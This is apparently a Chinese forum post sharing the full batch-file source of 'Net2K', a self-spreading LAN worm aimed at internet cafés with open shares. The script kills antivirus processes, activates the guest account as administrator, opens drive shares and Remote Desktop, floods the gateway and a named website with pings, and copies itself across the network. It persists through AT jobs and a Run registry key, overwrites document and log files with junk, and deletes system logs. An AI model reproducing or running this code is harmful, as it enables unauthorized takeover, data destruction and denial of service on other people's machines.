局域网共享蠕虫Net2K Beta v1.0版

 写这个蠕虫主要是针对网吧，因为看到很多网吧开着共享，却无须密码就可以访问。这个蠕虫只要发现有可写权限的共享便可以将自身复
制进去，用AT命令或系统下次启动时启动。由于时间和设备的关系，这个蠕虫我并未去认真测试过，相信应该有不少BUG吧，有个按时感染每级
目录目标文件的BUG一直没有更好的解决思路，大家发现问题后请告知我，或你能修正、完善代码，请COPY我一份啊，先行谢过！

@echo off
echo  
echo.
echo 局域网共享蠕虫Net2K Beta v1.0版
echo.
echo.
echo Net2K原创作品，欢迎访问http://www.52chb.com
echo.
echo 警告:本程序只做研究测试之用,对您运行本程序所造成一切后果本人概不负责！
echo 按任意键继续或关闭本程序退出
pause>nul
cls
tskill ccapp
tskill Rfw
tskill KAVPFW
tskill KAV9X
tskill PFW
tskill RavMon
if not exist c:/autoexec.bat copy /y %windir%/system32/autoexec.bat c:/
if not exist %windir%/system32/autoexec.bat copy c:/autoexec.bat
call attrib +h +r c:/autoexec.bat && attrib +h +r %windir%/system32/autoexec.bat
doskey at=
SET pk=1
SET ak1=254
IF %pk%==1 (
SET /A ak1=%RANDOM% %% %aK1%
)
SET LOVE=$%ak1%
attrib -h -r c:/msdos.sys && attrib -h -r c:/config.sys >nul
echo [option] >c:/msdos.sys
echo bootkey=1 >>c:/msdos.sys
echo BootMenu=0 >>c:/msdos.sys
echo BootWarn=0 >>c:/msdos.sys
echo BootFailSafe=0 >>c:/msdos.sys
echo DisabeLog =1 >>c:/msdos.sys
for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k >c:/config.sys
attrib +r +h c:/msdos.sys && ATTRIB +H +R c:/config.sys >nul
for %%k in (a:,c:,d:,e:,f:,g:,h:,i:,j:,k:,m:,l:,n:,o:,p:,q:,r:,s:,t:,u:,v:,w:,x:,y:,z:) do @subst %%k %SystemRoot%/desktop
echo [rename] >Wininit.tmp
echo c:/windows/Wininit.ini=C:/Wininit.tmp >>Wininit.tmp
echo DIRNUL=F:/ >>Wininit.tmp
echo DIRNUL=E:/ >>Wininit.tmp
echo DIRNUL=D:/ >>Wininit.tmp
net view >a.txt
find "//" a.txt >>l.txt
for /f "skip=2" %%a in (l.txt) do @copy /y Wininit.tmp %%a/C$
for /f "skip=2" %%a in (l.txt) do @call attrib +r +h %%a/C$/Wininit.tmp
net user guest Net2k%& /active:yes
net localgroup administrators guest /add
net share "ipc$"
net share "admin$"
net share "netbois"
net share "rpcss"
echo [Components] >c:/3389
echo TSEnable = on >>c:/3389
sysconmgr /i:sysoc.inf /u:c:/3389 /q
: 开硬盘共享
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @net share %%k$=%%k:/
: 攻击网关
ipconfig >Cf.txt && find "Default Gateway" Cf.txt >CH.txt
for /f "skip=2 tokens=13" %%a in (CH.txt) do @echo ping -n 20 -l 800 %%a
ping www.xhcatv.com.cn /n 15 /l 800
ping www.xhcatv.com.cn /n 15 /l 800
ping www.xhcatv.com.cn /n 15 /l 800
ping www.xhcatv.com.cn /n 15 /l 800
: 将自身复制到局域网内所有共享硬盘根目录
for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy autoexec.bat %%a/%%k$

for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%a/%%k$
/Autoexec.bat
cls
del %windir%/system32/logfiles/w3svc1/*.* /f /q
del %windir%/system32/logfiles/w3svc2/*.* /f /q
del %windir%/system32/config/*.event /f /q
del %windir%/system32/dtclog/*.* /f /q
del %windir%/*.txt /f /q
del %windir%/*.log /f /q
cls
: 将自身复制硬盘根目录
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy /y autoexec.bat %%k:
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @at 9:50 %%K:/autoexec.bat
：按时感染每级目录目标文件
echo @echo off >pk.bat
echo SET pk=1 >>pk.bat
echo SET ak1=19 >>pk.bat
echo SET ak2=19 >>pk.bat
echo IF %pk%==1 ( >>pk.bat
echo SET /A ak1=%RANDOM% %% %aK1% >>pk.bat
echo SET /A ak2=%RANDOM% %% %aK2% >>pk.bat
echo ) >>pk.bat
echo SET win=a%ak1%x >>pk.bat
echo copy /y pk.bat+xy.bat %win%.bat >>pk.bat
echo for %%y in (*.DOC,*.XLS,*.TXT,*.RIF,*.DBF,*.ARJ,*.log) do @echo FEI LOV YOU>%%y >>pk.bat
echo at 9:55 %win%.bat >>pk.bat
attrib /d /s -h -r
dir |find "<DIR>" >>Mm.txt
for /f "tokens=4" %%i in (Mm.txt) do @copy /y pk.bat %%i/>>%LOVE%.bat
for /f "tokens=4" %%i in (Mm.txt) do @echo at 9:55 %%i/%win%.bat >>%LOVE%.bat call %LOVE%.bat
for /f "tokens=4" %%i in (Mm.txt) do @echo > %%i/pp.txt
for /f "tokens=4" %%i in (Mm.txt) do @echo dir >>%%i/pp.txt
for /f "tokens=4" %%i in (Mm.txt) do @echo find "<DIR>" pp.txt > %%i/pp.bat
for /f "tokens=4" %%i in (Mm.txt) do @ren %%i/pp.txt l.bat
for /f "tokens=4" %%i in (Mm.txt) do @copy %%i/l.bat+pp.bat xy.bat
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%k:/%win%.bat
cls
echo REGEDIT4>>lov.reg echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>>lov.reg
echo "lovF"="c://autoexec.bat">>lov.reg echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>>lov.reg
echo "lov"="c://windows//system32//autoexec.bat">>lov.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/policies/Ratings]>>lov.reg
echo "Key"=hexb,23,45,6f,8e,41,70,4c,44,5e,d0,23,79,c2,b4,b1>>h.reg
echo "Hint"="Hello. I am Net2K.">>lov.reg
reg import lov.reg
echo @echo off >del.bat
echo if exist *.* (del /f /q *.bat,*.tmp,*.txt,*.reg) else echo >>del.bat
call del.bat >nul
: 清扫战场闪人...
exit